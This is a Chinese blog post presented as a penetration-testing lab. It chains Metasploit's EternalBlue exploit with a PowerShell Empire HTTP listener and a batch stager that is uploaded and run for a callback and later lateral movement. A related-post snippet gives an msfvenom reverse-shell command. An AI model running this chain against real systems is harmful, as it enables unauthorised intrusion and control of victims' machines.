msf+empire组合使用实验

已于 2022-06-01 22:22:47 修改
阅读量519 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全
于 2022-06-01 22:19:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/125091505
版权

目录

一、metasploit建立反弹连接

1.1.  先启动msfconsole

1.2. 查找exploit

1.3. 使用exploit,设置选项

1.4. 执行结果 

二、制作empire木马

2.1. 开启监听器

2.2. 制作木马

三、empire接入目标主机

3.1. 上传empire木马文件

3.2. empire连到目标主机

四、思考

一、metasploit建立反弹连接

1.1.  先启动msfconsole

msfconsole

1.2. 查找exploit

search ms17_010

1.3. 使用exploit,设置选项

use exploit/windows/smb/ms17_010_eternalblue
set LHOST 192.168.101.58
set RHOST 192.168.101.102
set target 3
#target 3 是Windows Server 2008 R2
run

1.4. 执行结果 

二、制作empire木马

2.1. 开启监听器

(Empire) > uselistener http
(Empire: uselistener/http) > set Name test1
(Empire: uselistener/http) > set Host 192.168.101.58:8800
(Empire: uselistener/http) > set Port 8800
(Empire: uselistener/http) > execute

2.2. 制作木马

usestager windows/launcher_bat
set Listener test1
        生成的木马放在路径/usr/share/powershell-empire/empire/client/generated-stagers/目录下

三、empire接入目标主机

3.1. 上传empire木马文件

        回到metasploit反弹连接,上传木马,并执行 
meterpreter > cd c:\\
upload /usr/share/powershell-empire/empire/client/generated-stagers/launcher.bat
shell
launcher.bat
        可以看到目标主机在empire上线:

3.2. empire连到目标主机

        interact交互进目标主机,做一些想做的事情了,比如信息收集、内网横向

四、思考

        为什么用ms17_010的exploit可以直接反弹,而不需要往目标机器投放木马呢?这个是利用操作系统的漏洞进行的反弹连接。
        为什么有的系统需要往目标机器投放木马呢?通用做法是制作投放木马,在目标主机上可以建立反弹连接。
見贤思齊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
empire用法笔记
发哥微课堂
02-28 4480
0x00:简介 empire 是一个针对内网针对域控的一个渗透测试框架,和 msf 类似。其中集成了很多内网的一些工具以及命令,使用方便,且 empire 生成的木马文件基于 powershell,所以在 windows 平台上有很好的免杀效果。结合 msf 使用更是如虎添翼。empire 安装下载命令如下: git clone https://github.com/EmpireProjec...
msf和empire的使用区别
qq_54030686的博客
11-19 1492
msf和empire的使用区别 msf需要先生成木马,在进行监听(需要保证payload一致) empire需要先监听,在生成木马, 监听的区别 设置payload 设置主机ip,端口等 empire: listeners(显示所有的监听种类) use listener http(使用监听种类) set host (设置主机ip) set port (设置主机端口号) 需要设置name:set name tianxia execute(执行) msf use auxiliary/dos/windows/rd
Metasploit 生成反弹连接木马
qq_26002283的博客
04-01 1325
“注 本文为笔者学习过程中记录” Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe 生成一个名为 test.exe 的木马文件到msf目录下 Step2: 通过 msfconsole 命令进入metasploit : Step3...
域渗透神器Empire安装和简单使用
hl1293348082的专栏
04-09 1914
1. Empire简介 官网介绍如下: Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable
云服务器msf跨域反弹shell
iuyoo的博客
03-29 5966
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
渗透之——Empire 反弹回 Metasploit
冰河的专栏
01-09 1567
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86178038 在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。 这里使用Empire的usem...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
linux系统安装msf的过程详解
09-14
启动MSF时,建议使用`msf`用户,这样可以确保数据库的正确同步。如果使用`root`用户启动,数据库可能无法正确同步。 MSF有一些常用命令,例如: - `msfconsole`:启动MSF控制台。 - `msfdb`:管理数据库,如初始化...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
后渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
Powershell Empire的使用
她叫常玉莹
07-04 4046
EmpireEmpire简介使用方法设置监听生成木马DLL木马launcherlauncher_vbs木马launcher_bat 木马Macro木马Ducky连接主机信息收集屏幕截图键盘记录剪贴板记录查找共享收集目标主机信息ARP扫描DNS信息获取查找域管登陆服务器IP本地管理组访问模块提权Bypass UACbypassuac_wscriptPowerUpAllChecks模块GPP横向渗透会话注入Invoke-PsExecInvoke-WMIPowerShell Remoting后门权限持久性劫持sh
Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转
J0o1ey Blog
01-19 2664
0x001-Cobaltstrike与MSF会话互转 ①Metasploit派生shell给Cobaltstrike 首先,你需要拿到一个metepreter会话,本例中session为1 Cobaltstrike的teamserver的ip为8.8...
empire入门
weixin_34308389的博客
08-18 480
参考文献:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4158.htmlhttp://www.freebuf.com/articles/network/175097.htmlhttps://www.tuicool.com/articles/...
empire3.6.1使用教程
weixin_45230825的博客
11-24 2936
empire使用 0 安装成功后在Empire文件夹中打开终端执行./empire 1.设置监听 输入 listeners 命令进入监听模块,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,选http 然后info就能查看监听的详细信息辣 最后设置好监听的Name(随便起)和Host(默认本机ip)和Port(80) 然后execute,就拿下了 在listeners 模块下通过 list 命令可查看已经设置的监听。 2.生成木马 设置好监听后通过 back 命令返回上一级
使用powershell-empire的windows/launcher_vbs模块生成vbs木马
u013930899的博客
05-21 530
使用windows/launcher_vbs模块生成vbs木马。 1. 套路 选择监听模式设置监听 选择使用stager 执行execute生成木马 投到被害主机执行木马 在powershell-empire上agent交互模式进行操作 2. 渗透过程 2.1 启动powershell-empire server powershell-empire server 2.2 连接powershell-empire client ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
中科曙光ParaStor300s分布式存储整机更换操作手册.docx
最新发布
07-12
中科曙光ParaStor300s分布式存储整机更换操作手册.docx
msf 监听模块使用案例
06-06
好的,这里给您举一个msf监听模块的使用案例。 假设攻击者想要入侵一家公司的内部网络,他们可以使用msf监听模块来创建一个监听器,以便漏洞利用或后门程序可以与攻击者的系统进行通信。以下是具体步骤: 1. 首先...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值